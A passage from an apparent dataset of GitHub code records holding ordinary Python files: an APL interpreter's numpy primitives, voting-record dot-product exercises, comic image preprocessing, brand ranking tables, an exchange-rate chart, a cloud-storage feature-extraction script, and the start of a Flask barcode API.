np.ndarray) -> np.ndarray:\n rng = np.random.default_rng()\n\n if alpha is None: # Roll (monadic ?)\n if not _is_int(omega) or np.any(omega < 0):\n raise DomainError('DOMAIN ERROR: Roll right argument must consist of non-negative integer(s)')\n roll = rng.random(size=omega.shape)\n ints = (omega*roll).astype(int)\n return np.where(omega == 0, rng.random(), ints)\n \n # Deal (dyadic ?)\n\n # Y must be a simple scalar or 1-element vector containing a non-negative \n # integer. X must be a simple scalar or 1-element vector containing a \n # non-negative integer and X≤Y.\n if omega.ndim > 1 or omega.ndim == 1 and len(omega) != 1:\n raise LengthError('LENGTH ERROR: right arg must be non-negative integer scalar or singleton')\n if alpha.ndim > 1 or alpha.ndim == 1 and len(alpha) != 1:\n raise LengthError('LENGTH ERROR: left arg must be non-negative integer scalar or singleton')\n \n deal = omega if omega.ndim == 0 else omega[0]\n if deal < 0:\n raise DomainError('DOMAIN ERROR: Deal right argument must be non-negative')\n count = alpha if alpha.ndim == 0 else alpha[0]\n if count < 0:\n raise DomainError('DOMAIN ERROR: Deal left argument must be non-negative')\n if count > deal:\n raise DomainError('DOMAIN ERROR: Deal left argument must be less than or equal to right argument')\n\n # R is an integer vector obtained by making X random selections from ⍳Y \n # without repetition. \n return np.random.choice(deal, count, replace=False)\n\ndef tilde(alpha: Optional[np.ndarray], omega: np.ndarray) -> np.ndarray:\n if alpha is None:\n if not _is_int(omega) or not _is_bool(omega):\n raise DomainError('DOMAIN ERROR: right argument must be Boolean array')\n return omega ^ 1\n else:\n if alpha.ndim > 1: # Left must not exceed rank 1. Right will be ravelled.\n raise RankError('RANK ERROR: left argument must be a scalar or vector')\n return np.setdiff1d(alpha, np.ravel(omega), assume_unique=True)\n\ndef nyi(alpha: Optional[np.ndarray], omega: np.ndarray) -> np.ndarray: # type: ignore\n raise NYIError('NYI ERROR')\n\nclass Voc:\n \"\"\"\n Voc is the global vocabulary of built-in arrays, functions and operators. This class should not\n be instantiated.\n \"\"\"\n\n arrs: dict[str, np.ndarray] = {\n '⍬': np.array([], dtype=int),\n '⎕IO': np.array(0),\n '⎕A': np.array(ascii_letters[26:]),\n '⎕D': np.arange(10)\n }\n\n funs: dict[str, Callable] = {\n '↑': lambda a, w: uparrow(Env.resolve(a), Env.resolve(w)),\n '≢': lambda a, w: tally(Env.resolve(a), Env.resolve(w)),\n '≡': lambda a, w: match(Env.resolve(a), Env.resolve(w)),\n '⍳': lambda a, w: iota(Env.resolve(a), Env.resolve(w)),\n '⊂': lambda a, w: left_shoe(Env.resolve(a), Env.resolve(w)),\n '⊃': lambda a, w: right_shoe(Env.resolve(a), Env.resolve(w)),\n ',': lambda a, w: comma(Env.resolve(a), Env.resolve(w)),\n '⍴': lambda a, w: rho(Env.resolve(a), Env.resolve(w)),\n '⊢': lambda a, w: rtack(Env.resolve(a), Env.resolve(w)),\n '⊣': lambda a, w: ltack(Env.resolve(a), Env.resolve(w)),\n '+': lambda a, w: plus(Env.resolve(a), Env.resolve(w)),\n '-': lambda a, w: minus(Env.resolve(a), Env.resolve(w)),\n '×': lambda a, w: times(Env.resolve(a), Env.resolve(w)),\n '÷': lambda a, w: divide(Env.resolve(a), Env.resolve(w)),\n '⍉': lambda a, w: transpose(Env.resolve(a), Env.resolve(w)),\n '⍋': lambda a, w: grade_up(Env.resolve(a), Env.resolve(w)),\n '⍒': lambda a, w: grade_down(Env.resolve(a), Env.resolve(w)),\n '⊤': lambda a, w: encode(Env.resolve(a), Env.resolve(w)),\n '⊥': lambda a, w: decode(Env.resolve(a), Env.resolve(w)),\n '?': lambda a, w: roll_deal(Env.resolve(a), Env.resolve(w)),\n '~': lambda a, w: tilde(Env.resolve(a), Env.resolve(w)),\n }\n\n hybs: dict[str, tuple[Callable, Callable]] = {\n '/': (replicate, reduce),\n '⌿': (replicate_first, reduce_first),\n '←': (gets, fun_gets),\n }\n \n mops: dict[str, Callable] = {\n '¨': each,\n '⌸': nyi,\n '⍨': nyi\n }\n\n dops: dict[str, Callable] = {\n '⍤': nyi,\n '⍣': nyi,\n '⌺': nyi,\n '@': nyi,\n '⍥': nyi,\n }\n\n @classmethod\n def has_builtin(cls, f: str) -> bool:\n return f in cls.funs\n\n @classmethod\n def get_fn(cls, f: str) -> Callable:\n \"\"\"\n Lookup a function from the global symbol table\n \"\"\"\n try:\n return cls.funs[f]\n except KeyError:\n raise ValueError(f\"VALUE ERROR: Undefined function: '{f}'\")\n\n @classmethod\n def get_mop(cls, mop: str) -> Callable:\n try:\n return cls.mops[mop]\n except KeyError:\n raise ValueError(f\"VALUE ERROR: Undefined monadic operator: '{mop}'\")\n\n @classmethod\n def get_dop(cls, dop: str) -> Callable:\n try:\n return cls.dops[dop]\n except KeyError:\n raise ValueError(f\"VALUE ERROR: Undefined dyadic operator: '{dop}'\")\n\n @classmethod\n def get_hyb(cls, hyb: str) -> tuple[Callable, Callable]:\n try:\n return cls.hybs[hyb]\n except KeyError:\n raise ValueError(f\"VALUE ERROR: Undefined hybrid: '{hyb}'\")","repo_name":"xpqz/numpapl","sub_path":"primitives.py","file_name":"primitives.py","file_ext":"py","file_size_in_byte":23421,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"45"} +{"seq_id":"38631212182","text":"from vec import Vec\nfrom triangular import *\n\n# Exercise 2.11.4\nD = {0, 1, 2}\nrowlist = [Vec(D, {0:1, 1:3, 2:2}), Vec(D, {1:2, 2:4}), Vec(D, {2:-10})]\nb = [7,4,12]\nans = triangular_solve_n(rowlist, b)\n#print(ans)\n\n# Section 2.11.5\nlabel_list = ['a','b','c','d']\nD = set(label_list)\nrowlist=[Vec(D,{'a':4, 'b':-2,'c':0.5,'d':1}), Vec(D,{'b':2,'c':3,'d':3}),\n Vec(D,{'c':5, 'd':1}), Vec(D,{'d':2.})]\nb = [6, -4, 3, -8]\nans = triangular_solve(rowlist, label_list, b)\n#print(ans)\n\n# Section 2.12 Lab: Comparing voting records using dot-product\n# Task 2.12.1\ndef create_voting_dict(strlist):\n dct = dict()\n for ent in strlist:\n a = ent.split(' ')\n votes = list()\n for i in range(3, len(a)):\n votes.append(int(a[i]))\n dct[a[0]] = votes\n return dct\n\nvoting_dict = create_voting_dict(list(open('voting_record_dump109.txt')))\n#print(len(voting_dict))\n#print(voting_dict)\n\n# Task 2.12.2\ndef policy_compare(sen_a, sen_b, voting_dict):\n return sum([a*b for (a,b) in zip(voting_dict[sen_a], voting_dict[sen_b])])\n\ndot = policy_compare('Brownback', 'Murray', voting_dict)\nprint(dot)\ndot = policy_compare('Roberts', 'Rockefeller', voting_dict)\nprint(dot)\n\n# Task 2.12.3\ndef most_similar(sen, voting_dict):\n most = -100\n nm = ''\n for k in voting_dict.keys():\n dot = policy_compare(sen, k, voting_dict)\n if sen != k and dot > most:\n most = dot\n nm = k\n return nm\n\nprint(most_similar('Akaka', voting_dict))\n\n# Task 2.12.4\ndef least_similar(sen, voting_dict):\n least = 100\n nm = ''\n for k in voting_dict.keys():\n dot = policy_compare(sen, k, voting_dict)\n if sen != k and dot < least:\n least = dot\n nm = k\n return nm\n\nprint(least_similar('Akaka', voting_dict))\n\n\n# sum of vectors\n\nv1 = Vec({'a','b','c'}, {'a':1,'b':2,'c':3})\nv2 = Vec({'a','b','c'}, {'a':2,'b':3,'c':4})\nprint(sum({2*v1,v2}))","repo_name":"ginuerzh/codingthematrix","sub_path":"vector/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"35953440922","text":"import cv2\r\nimport os\r\nimport numpy as np\r\nimport train.train_LRC\r\n\r\nclass Preprossesor :\r\n def __init__(self, comic_name):\r\n self.dir_path = os.path.join(os.path.dirname(__file__), comic_name)\r\n raw_data_path = os.path.join(self.dir_path, 'raw')\r\n path_list = os.listdir(raw_data_path)\r\n path_list.sort()\r\n self.path_list = [os.path.join(raw_data_path, x) for x in path_list]\r\n\r\n self.resized_data_path = os.path.join(self.dir_path, 'resized')\r\n if not os.path.exists(self.resized_data_path):\r\n os.makedirs(self.resized_data_path)\r\n\r\n self.edged_data_path = os.path.join(self.dir_path, 'edge')\r\n if not os.path.exists(self.edged_data_path):\r\n os.makedirs(self.edged_data_path)\r\n\r\n self.LRGT_data_path = os.path.join(self.dir_path, 'LRGT')\r\n if not os.path.exists(self.LRGT_data_path):\r\n os.makedirs(self.LRGT_data_path)\r\n\r\n\r\n def preprocess_save(self):\r\n for path in self.path_list:\r\n img = cv2.imread(path)\r\n ######################################################################################\r\n img_resized = cv2.resize(img[75:-75, :, :], (256, 256),interpolation = cv2.INTER_LINEAR)\r\n ######################################################################################\r\n ######################################################################################\r\n mask = np.mean(img, axis=2) < 80\r\n outline = (cv2.Canny(img, 100, 180) / 255).astype(np.bool)\r\n outline = np.logical_not(np.logical_or(outline, mask)).astype(np.uint8) * 255\r\n outline = cv2.resize(outline[75:-75, :], (256, 256),interpolation = cv2.INTER_AREA)\r\n ######################################################################################\r\n ######################################################################################\r\n img_LRGT = cv2.resize(img_resized, (32, 32), interpolation=cv2.INTER_LINEAR)\r\n img_LRGT = cv2.resize(img_LRGT, (256, 256), interpolation=cv2.INTER_LINEAR)\r\n ######################################################################################\r\n\r\n\r\n file_name = path[path.find('raw') + 5:]\r\n resized_path = os.path.join(self.resized_data_path, file_name)\r\n edged_path = os.path.join(self.edged_data_path, file_name)\r\n LRGT_path = os.path.join(self.LRGT_data_path, file_name)\r\n\r\n cv2.imwrite(resized_path, img_resized)\r\n cv2.imwrite(edged_path, outline)\r\n cv2.imwrite(LRGT_path, img_LRGT)\r\n\r\n\r\n#\r\n# P = Preprossesor('yumi_cell')\r\n# P.preprocess_save()\r\n#\r\n# P = Preprossesor('more_data')\r\n# P.preprocess_save()\r\n\r\n\r\n# data_maker = train.train_LRC.CGAN(20, input_dir = \"test\") #반드시 LRC가 학습된 뒤에 실행\r\n# data_maker.make_data_for_BD(2,2, start=0, end = 1000)\r\n# data_maker = train.train_LRC.CGAN(20, input_dir = \"yumi_cell\") #반드시 LRC가 학습된 뒤에 실행\r\n# data_maker.make_data_for_BD(2,2, start=0, end = 7380)\r\ndata_maker = train.train_LRC.CGAN(20, input_dir = \"more_data\") #반드시 LRC가 학습된 뒤에 실행\r\ndata_maker.make_data_for_BD(2,2, start=0, end = 5900)","repo_name":"demul/auto_colorization_project","sub_path":"naive_two_step_CGAN/data_preprocessing.py","file_name":"data_preprocessing.py","file_ext":"py","file_size_in_byte":3262,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"45"} +{"seq_id":"3231925848","text":"brand_dict_reps = {\n \"Colgate\" : [\"CP_News\",\"Colgate\"], \n \"Danone\" : [\"DanoneCanada\",\"Danone\"],\n \"Cartier\" : [\"Cartier\",\"Fond_Cartier\"],\n \"Ferrari\" : [\"Ferrari\",\"ScuderiaFerrari\"],\n \"Santander\" : [\"SantanderUSA\",\"SantanderBankUS\",\"bancosantander\"],\n \"Dior\" : [\"Dior\"],\n \"Kellogg’s\" : [\"KelloggsCareers\",\"KelloggsUS\",\"KelloggCompany\"],\n \"FedEx\" : [\"FedExOffice\",\"FedExHelp\",\"FedEx\",\"FedExCanada\"],\n \"Corona\" : [\"coronacanada\",\"CoronaUSA\",\"corona\"],\n \"LinkedIn\" : [\"LinkedInMktg\",\"LinkedInHelp\",\"LinkedIn\"],\n \"DHL\" : [\"DHLGlobal\",\"DHLCanadaHelp\",\"DHLUS\"],\n \"Caterpillar\" : [\"CaterpillarInc\"],\n \"Xiaomi\" : [\"XiaomiUSA\",\"Xiaomi\"], \n \"Jack Daniel’s\" : [\"JackDaniels_US\"],\n \"Huawei\" : [\"HuaweiUSA\",\"Huawei_devs\",\"Huawei\"],\n \"Kia\" : [\"Kia\",\"Kia_Worldwide\",\"KiaCanada\"],\n \"Tiffany & Co.\" : [\"TiffanyAndCo\"],\n \"Prada\" : [\"FondazionePrada\",\"Prada\"],\n \"Hewlett Packard Enterprise\" : [\"HPE\",\"HPE_OEM\"],\n \"Panasonic\" : [\"Panasonic_mob\",\"PanasonicNA\",\"panasonic\"],\n \"Johnson & Johnson\" : [\"JNJNews\"],\n \"Hennessy\" : [\"Hennessy\",\"MoetHennessy\"],\n \"KFC\" : [\"kfc_canada\",\"TellTheColonel\",\"kfc\"],\n \"Heineken\" : [\"HeinekenCA\",\"Heineken_Exp\",\"Heineken_US\",\"Heineken\"],\n \"Burberry\" : [\"BurberryCorp\",\"Burberry\"],\n \"Canon\" : [\"CanonCanada\",\"CanonUSApro\",\"CanonUSAimaging\",\"CanonUSABiz\",\"CanonUSA\"],\n \"Land Rover\" : [\"LandRoverCanada\",\"jaguarlandrover\",\"LandRoverUSA\",\"LandRover\"],\n \"MINI\" : [\"MINIUSA\",\"MINICanada\",\"MINI\"],\n \"Sephora\" : [\"Sephora\"],\n }\n\nbrand_dict_ft = {\n \"Colgate\" : [\"72\",\"10,130\",\"+5%\",\"DOWN 4 PLACES\"],\n \"Danone\" : [\"73\",\"9,528\",\"-3%\",\"DOWN 8 PLACES\"],\n \"Cartier\" : [\"74\",\"9,521\",\"+17%\",\"DOWN 1 PLACE\"],\n \"Ferrari\" : [\"75\",\"9,365\",\"+31%\",\"UP 1 PLACE\"],\n \"Santander\" : [\"76\",\"9,015\",\"+11%\",\"DOWN 2 PLACES\"],\n \"Dior\" : [\"77\",\"8,919\",\"+27%\",\"RANK UNCHANGED\"],\n \"Kellogg’s\" : [\"78\",\"8,747\",\"+1%\",\"DOWN 6 PLACES\"],\n \"FedEx\" : [\"79\",\"8,166\",\"+8%\",\"DOWN 4 PLACES\"],\n \"Corona\" : [\"80\",\"7,764\",\"+12%\",\"DOWN 2 PLACES\"],\n \"LinkedIn\" : [\"81\",\"7,595\",\"+19%\",\"UP 2 PLACES\"],\n \"DHL\" : [\"82\",\"7,518\",\"+11%\",\"DOWN 2 PLACES\"],\n \"Caterpillar\" : [\"83\",\"7,397\",\"+14%\",\"DOWN 1 PLACE\"],\n \"Xiaomi\" : [\"84\",\"7,326\",\"NEW\",\"NEW\"],\n \"Jack Daniel’s\" : [\"85\",\"7,171\",\"+10%\",\"DOWN 4 PLACES\"],\n \"Huawei\" : [\"86\",\"6,634\",\"+7%\",\"DOWN 1 PLACE\"],\n \"Kia\" : [\"87\",\"6,612\",\"+9%\",\"DOWN 1 PLACE\"],\n \"Tiffany & Co.\" : [\"88\",\"6,552\",\"+19%\",\"UP 4 PLACES\"],\n \"Prada\" : [\"89\",\"6,548\",\"+21%\",\"UP 5 PLACES\"],\n \"Hewlett Packard Enterprise\" : [\"90\",\"6,486\",\"+3%\",\"DOWN 6 PLACES\"],\n \"Panasonic\" : [\"91\",\"6,337\",\"+9%\",\"DOWN 3 PLACES\"],\n \"Johnson & Johnson\" : [\"92\",\"6,130\",\"+3%\",\"DOWN 5 PLACES\"],\n \"Hennessy\" : [\"93\",\"6,111\",\"+15%\",\"UP 2 PLACES\"],\n \"KFC\" : [\"94\",\"6,089\",\"+12%\",\"DOWN 1 PLACE\"],\n \"Heineken\" : [\"95\",\"6,003\",\"+5%\",\"DOWN 6 PLACES\"],\n \"Burberry\" : [\"96\",\"5,917\",\"+14%\",\"UP 1 PLACE\"],\n \"Canon\" : [\"97\",\"5,828\",\"-15%\",\"DOWN 18 PLACES\"],\n \"Land Rover\" : [\"98\",\"5,593\",\"+10%\",\"RANK UNCHANGED\"],\n \"MINI\" : [\"99\",\"5,579\",\"+7%\",\"DOWN 3 PLACES\"],\n \"Sephora\" : [\"100\",\"5,491\",\"+19%\",\"RANK UNCHANGED\"],\n }\n","repo_name":"sets018/branding_nlp_project","sub_path":"data scrapping/accounts info/dicts_03.py","file_name":"dicts_03.py","file_ext":"py","file_size_in_byte":3685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"4540465524","text":"##FUNCION GRAFICA LA SERIE LARGA DEL MKT CAP EN USD\r\ndef paint_currency(ticker, puntos):\r\n ### GRAFICA LOS ULTIMOS N puntos del tipo de cambio\r\n ### Si el indice esta en formato datetime, al correr este codigo las fechas aparecen en el eje x automaticamente\r\n global df, cur\r\n #\r\n # ABRE EL DATAFRAME DE CURRENCIES\r\n #\r\n open_file_currency(ticker)\r\n #\r\n df = cur\r\n #\r\n #\r\n # VERIFICA SI LA SERIE ES UN TIPO DE CAMBIO REAL O NOMINAL\r\n if ticker == \"USDARS_BCRA\": \r\n serie = \"tc_nominal\"\r\n tipo_de_cambio = \"nominal\"\r\n elif ticker == \"USDARS_LIBRE\":\r\n serie = \"tc_nominal\"\r\n tipo_de_cambio = \"nominal\"\r\n elif ticker == \"USDARS_PPP\":\r\n serie = \"tc_real\"\r\n tipo_de_cambio = \"bilateral real\"\r\n else:\r\n serie = \"tc_nominal\"\r\n tipo_de_cambio = \"nominal\"\r\n #\r\n # Calcula las Moving Average y los suma a la df\r\n #\r\n if serie == \"tc_nominal\":\r\n df[\"MA200\"] = df.tc_nominal.rolling(200).mean()\r\n df[\"MA100\"] = df.tc_nominal.rolling(100).mean()\r\n df[\"MA50\"] = df.tc_nominal.rolling(50).mean()\r\n df[\"MA25\"] = df.tc_nominal.rolling(25).mean()\r\n elif serie == \"tc_real\":\r\n df[\"MA200\"] = df.tc_real.rolling(200).mean()\r\n df[\"MA100\"] = df.tc_real.rolling(100).mean()\r\n df[\"MA50\"] = df.tc_real.rolling(50).mean()\r\n df[\"MA25\"] = df.tc_real.rolling(25).mean()\r\n else:\r\n print (\"Problema con la serie no es ni real ni nominal\")\r\n #\r\n #\r\n # DEFINE EL RANGO DEL CHART\r\n # \r\n puntos = -1*int(puntos)\r\n #\r\n #\r\n #Rango inicial. La serie puede identificarse como 0 (el primer dato de la serie) o como un numero negativo comenzando desde el final de la serie\r\n rango_inicial = puntos\r\n #\r\n #Rango final. La serie puede identificarse como 0 (el primer dato de la serie) o como un numero negativo comenzando desde el final de la serie\r\n # 0 es el final de la serie pero se debe completar ni con \"\" ni con 0\r\n rango_final = -1\r\n #\r\n #\r\n # GRAFICA\r\n #\r\n # Da la orden de graficar el rango\r\n ax = df[[serie]].iloc[rango_inicial:rango_final].plot(color ='k', linestyle = '-', figsize =(12,12), linewidth = 1 ) #18,12 es grande\r\n #\r\n #\r\n # Activa las medias moviles o las desactiva\r\n #\r\n df['MA200'].iloc[rango_inicial:rango_final].plot(ax=ax, label ='MA200', color ='g', linestyle = '-', linewidth = 1, ) #18,12 es grande\r\n df['MA100'].iloc[rango_inicial:rango_final].plot(ax=ax, label ='MA100', color ='r', linestyle = '-', linewidth = 1 ) #18,12 es grande\r\n #df['MA50'].iloc[rango_inicial:rango_final].plot(ax=ax, label ='MA50', color ='y', linestyle = '-', linewidth = 1 ) #18,12 es grande\r\n #df['MA25'].iloc[rango_inicial:rango_final].plot(ax=ax, label ='MA25', color ='m', linestyle = '-', linewidth = 1 ) #18,12 es grande\r\n #\r\n #\r\n # Define el titulo como una variable string\r\n title = \"Tipo de cambio \" + tipo_de_cambio + \" \" + ticker\r\n plt.title(title)\r\n # \r\n # \r\n # Add a legend\r\n #\r\n #plt.legend('off')\r\n #\r\n # Situa la leyenda arriba a la izquierda (loc=2)\r\n plt.legend(loc=2)\r\n # \r\n # Pone los labels del eje x de forma vertical\r\n plt.xticks(rotation='vertical')\r\n #\r\n # Define el margen de cuan pegados estan los labels entre si del eje x. cuanto mas pequeno empieza a ser neceseario mostrar mas detalle en los labels.\r\n plt.margins(0.1)\r\n #\r\n #Distancia desde el fondo del chart (corre la altura del eje x en el dibujo. Tweak spacing to prevent clipping of tick-labels\r\n plt.subplots_adjust(bottom=0.25)\r\n #\r\n #Define el label del eje x como una variable string\r\n x_label = \"Fecha\"\r\n #\r\n #Define el xlabel, x=1 estaria en el limite inferior derecho, x=0.50 estaria casi en el medio\r\n plt.xlabel(x_label, fontsize=9, x=0.50, y=0.10)\r\n #\r\n #Define el label del eje y como una variable string\r\n y_label = \"en ARS por USD\"\r\n #\r\n #Define el ylabel, y=1 estaria en el limite superior, y=0.50 estaria casi en el medio\r\n plt.ylabel(y_label, fontsize=9, x=0.10, y=0.50)\r\n #\r\n #\r\n plt.axis('on') \r\n #Dibuja una recta horizontal en y = 600 de color azul\r\n #plt.axhline(y = 600, xmin = 0, xmax = 250000)\r\n ##Dibuja una recta horizontal en y = 0 de color rojo\r\n #plt.axhline(color = 'r')\r\n plt.grid(True)\r\n plt.grid(color = 'k') #r=red b=blue g=green y=yellow c=cian w=white m=magenta k=black\r\n plt.grid(linestyle = ':') # '-' = linea solida, '--' = linea a rayas,'-.' = puntos y rayas, ':' = linea punteada,\r\n plt.grid(linewidth=1) # 1 es lo mas finito, 20 es grueso\r\n plt.text(500, 300, \"Más texto\", fontsize = 200)\r\n #\r\n # Define que el formato de los numeros del eje y sean con coma para separar los miles \r\n ax.yaxis.set_major_formatter(mpl.ticker.StrMethodFormatter('{x:,.0f}'))\r\n #\r\n # AGREGA FOOTNOTE\r\n #plt.text(0.5, 0.5, \"Fuente: BCRA, GCB CAPITAL\", fontsize=12, horizontalalignment='center', verticalalignment='center')\r\n plt.annotate('Fuente: BCRA, GCB CAPITAL', (0,0), (-70, -100), xycoords='axes fraction', textcoords='offset points', va='top')\r\n #\r\n #\r\n # PROBLEMA\r\n import matplotlib.dates as mdates\r\n #ax.xaxis.set_major_formatter(mdates.DateFormatter('%Y-%m-%d')\r\n #ax.xaxis.set_major_formatter(mdates.DateFormatter('%Y-%m-%d %H:%M:%S'))\r\n ax.xaxis.set_major_formatter(mdates.DateFormatter('%Y-%m-%d '))\r\n #\r\n # Save Figure\r\n #\r\n # Location jamas termina con una barra\r\n location = \"C:\\GCB_CAPITAL\\CURRENCIES\"\r\n #\r\n # Slash es la barra\r\n slash = str(\"//\")\r\n #\r\n # Filename parte 1 es un nombre que le agrega el programa a los archivos\r\n file_name_parte1 = \"\"\r\n #\r\n # Filename parte 2 es el ticker\r\n file_name_parte2 = ticker\r\n #\r\n # file_name es el total del nombre del archivo incluyendo al ticker que lo identifica \r\n file_name = file_name_parte1 + file_name_parte2 \r\n #\r\n # Extension es la extension del archivo\r\n #\r\n df.tail(1).index # para buscar la ultima fecha de la serie\r\n intermedio = str(df.tail(1).index) # Transformamos en una variable string\r\n b = intermedio[16:26] # Extraemos el dato de la fecha del ultimo dia de la serie en formato STRING\r\n extension = \"_\" + str(b)\r\n #\r\n # Path es el todo la linea para llegar al archivo\r\n path = location + slash + file_name + extension\r\n #print (path)\r\n #\r\n # Graba en formato png. Fijarse que no hay que poner la extension.\r\n # A Modo de Ejemplo seria: plt.savefig('C:\\GCB_CAPITAL\\myfig')\r\n plt.savefig(path)\r\n plt.show() # lo desactive para poder grabar todos los archivos\r\n return\r\n\r\n#paint_currency(\"USDARS_LIBRE\", \"1000\") #Ultimos 1000 puntos\r\n#paint_currency(\"USDARS_LIBRE\", \"261\") #Ultimo año\r\n#paint_currency(\"USDARS_LIBRE\", \"0\") #Serie Historica\r\n\r\n#paint_currency(\"USDARS_BCRA\", \"1000\") #Ultimos 1000 puntos\r\n#paint_currency(\"USDARS_BCRA\", \"261\") #Ultimo año\r\n#paint_currency(\"USDARS_BCRA\", \"0\") #Serie Historica\r\n\r\n#open_file_currency(\"USDARS_PPP\")\r\n#paint_currency(\"USDARS_PPP\", \"1000\") #Ultimos 1000 puntos\r\n#paint_currency(\"USDARS_PPP\", \"261\") #Ultimo año\r\n#paint_currency(\"USDARS_PPP\", \"0\") #Serie Historica\r\n\r\n","repo_name":"gcbockelmann/09_MAR_2020_CASA","sub_path":"D3470_chart_currency.py","file_name":"D3470_chart_currency.py","file_ext":"py","file_size_in_byte":7248,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"1019850077","text":"# This tool takes the raw usage data and splits it into session files\n\nfrom google.cloud import storage\nimport os\nimport time\n\nimport gzip\nimport json\nimport base64\nimport sys\nimport traceback\nimport time\nimport random\n\nfrom storage_utils import download_blob, upload_blob, log, storage_client\nfrom feature_usage_extractor import extract, VERSION\n# import storage_utils\n\nMAX_MEM = 1 * 1000 * 1000 * 1000\n\nSESSIONS_BUCKET = \"dynamo_instrumentation_sessions\"\nFEATURES_BUCKET = \"dynamo_instrumentation_features\"\n\ndef sorted_session_name_to_features_name(sorted_session_name):\n features_name = \"{}.features.{}\".format(sorted_session_name, VERSION)\n return features_name\n\ndef get_blob_names_to_process(folder_id_str = None):\n if folder_id_str is None:\n folder_id = random.randint(0, 16*16*16)\n folder_id_str = (\"%x\" % folder_id).zfill(3)\n\n print (\"Selected folder: {}\".format(folder_id_str))\n sessions_blob_to_date_map = {}\n blobs_requiring_extraction = set()\n\n bucket = storage_client.get_bucket(SESSIONS_BUCKET) \n sessions_blobs = bucket.list_blobs(prefix=folder_id_str, delimiter=None)\n for sessions_blob in sessions_blobs:\n blob_name = sessions_blob.name\n if not blob_name.endswith('.sorted.gz'):\n continue\n blob_udpated = sessions_blob.updated\n sessions_blob_to_date_map[blob_name] = blob_udpated\n log(\"Blobs ({}): {}\".format(SESSIONS_BUCKET, len(sessions_blob_to_date_map.keys())))\n \n featuress_blob_to_date_map = {}\n bucket = storage_client.get_bucket(FEATURES_BUCKET)\n features_blobs = bucket.list_blobs(prefix=folder_id_str, delimiter=None)\n for feature_blob in features_blobs:\n blob_name = feature_blob.name\n blob_udpated = feature_blob.updated\n featuress_blob_to_date_map[blob_name] = blob_udpated\n log(\"Blobs ({}): {}\".format(FEATURES_BUCKET, len(featuress_blob_to_date_map.keys())))\n\n\n missing = 0\n update = 0\n already_done = 0\n\n for session_blob in sessions_blob_to_date_map.keys():\n features_name = sorted_session_name_to_features_name(session_blob)\n if features_name not in featuress_blob_to_date_map.keys():\n missing += 1\n blobs_requiring_extraction.add(session_blob)\n continue\n \n session_updated = sessions_blob_to_date_map[session_blob]\n features_updated = featuress_blob_to_date_map[features_name]\n\n if session_updated >= features_updated:\n update += 1\n blobs_requiring_extraction.add(session_blob)\n continue\n\n already_done += 1\n \n log(\"Feature extraction needed: {} | {} (missing), {} (update) | {} (already_done)\"\n .format(len(blobs_requiring_extraction), missing, update, already_done))\n return list(blobs_requiring_extraction)\n\n\ndef extract_features(blob_name, features_blob_name, temp_path):\n log(\"Extract features for ({}): {} => {}\".format(VERSION, blob_name, features_blob_name))\n\n blob_session_name = blob_name.split('/')[-1]\n features_session_name = features_blob_name.split('/')[-1]\n\n blob_path_to_proc = os.path.join(temp_path, blob_session_name)\n out_path = os.path.join(temp_path, features_session_name)\n \n log (\"Downloading {} => {}\".format(blob_name, blob_path_to_proc))\n download_blob(SESSIONS_BUCKET, blob_name, blob_path_to_proc)\n\n extract(blob_path_to_proc, out_path)\n log(\"Features extracted: {} => {}\".format(blob_path_to_proc, out_path))\n\n if not os.path.exists(out_path):\n return False\n \n upload_blob(FEATURES_BUCKET, out_path, features_blob_name)\n\n log(\"About to remove: {}\".format(blob_path_to_proc))\n os.remove(blob_path_to_proc)\n \n log(\"About to remove: {}\".format(out_path))\n os.remove(out_path)\n\n return True\n\ndef process_blob_names(blob_names_to_process):\n log (\"Blobs to process: {}\".format(len(blob_names_to_process)))\n for blob_name in blob_names_to_process:\n features_blob_name = sorted_session_name_to_features_name(blob_name)\n result = extract_features(blob_name, features_blob_name, DATA_FILES_TEMP_PATH)\n\n if not result:\n print (\"WARNING: failed to process: {}\".format(blob_name))\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) < 2 or len(sys.argv) > 3:\n print (\"Usage: temp_path [linear]\")\n print (\"Extract features for sessions\")\n print \n exit(1)\n\n DATA_FILES_TEMP_PATH = sys.argv[1]\n LINEAR = False\n if len(sys.argv) == 3 and sys.argv[2] == \"linear\":\n log (\"Linear mode\")\n LINEAR = True\n\n if LINEAR:\n for i in range(16*16*16):\n folder_id_str = (\"%x\" % i).zfill(3)\n blob_names_to_process = get_blob_names_to_process(folder_id_str)\n process_blob_names(blob_names_to_process)\n else:\n blob_names_to_process = get_blob_names_to_process()\n process_blob_names(blob_names_to_process)\n","repo_name":"DynamoDS/Coulomb","sub_path":"Pipeline/sorted_sessions_to_features.py","file_name":"sorted_sessions_to_features.py","file_ext":"py","file_size_in_byte":4923,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"45"} +{"seq_id":"17626403671","text":"import flask\nfrom flask import request, jsonify\nimport json\nfrom ingredient_matcher import findCommonNameFromOfficial\nimport requests\nimport mysql.connector\nimport database_connector as dbConnector\nimport urllib.parse\nimport random\nfrom datetime import datetime \n# ref: https://programminghistorian.org/en/lessons/creating-apis-with-python-and-flask\napp = flask.Flask(__name__)\napp.config[\"DEBUG\"] = True\napp.url_map.strict_slashes = False\n\n\n@app.route('/', methods=['GET'])\ndef home():\n return \"

    hello

    \"\n\n\n@app.route('/api/barcode/', methods=['GET'])\ndef barcode():\n \"\"\"\n Handles getting the official name from the barcode API\n\n INPUT:\n Expects the barcode in the url as an argument, i.e \n /api/barcode/?barcode=NNN\n\n \n OUTPUT:\n {\n \"Status\": \"OK\" \n \"Official Name\": \"Rossco Thin Spaghetti\"\n }\n\n Sample Curl:\n curl http://127.0.0.1:5000/api/barcode/?barcode=737628064502\n \"\"\"\n params = request.args\n api_response_json = None\n response_dict = {}\n response_dict[\"Status\"] = \"ERROR\"\n try: # catch spaghetti o's error\n if 'barcode' in params:\n barcode = params['barcode']\n\n api_response = requests.get(\n 'https://world.openfoodfacts.org/api/v0/product/{0}.json'.\n format(barcode))\n api_response_json = api_response.json()\n\n if api_response_json['status_verbose'] == 'product found':\n response_dict['Status'] = \"OK\"\n response_dict[\"Official 